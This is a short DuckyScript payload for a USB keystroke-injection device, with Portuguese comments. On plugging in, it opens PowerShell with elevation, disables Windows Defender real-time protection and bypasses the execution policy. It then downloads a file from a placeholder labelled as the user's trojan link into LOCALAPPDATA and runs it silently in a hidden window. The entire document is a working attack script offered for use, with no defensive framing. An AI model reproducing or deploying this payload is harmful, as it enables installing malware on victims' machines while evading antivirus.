REM Deixa o HID enumerar
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
CTRL-SHIFT ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
STRING Set-ExecutionPolicy Bypass -Scope Process -Force
ENTER
DELAY 2000
REM Realiza o Download e a execução do arquivo
STRING (New-Object System.Net.WebClient).DownloadFile("link do seu trojan", "$($env:LOCALAPPDATA)\nome do arquivo que vai abrir"); Start-Process -FilePath "$($env:LOCALAPPDATA)\nome do arquivo que vai abrir" -ArgumentList "/S" -WindowStyle Hidden
ENTER
DELAY 7000
STRING exit
ENTER
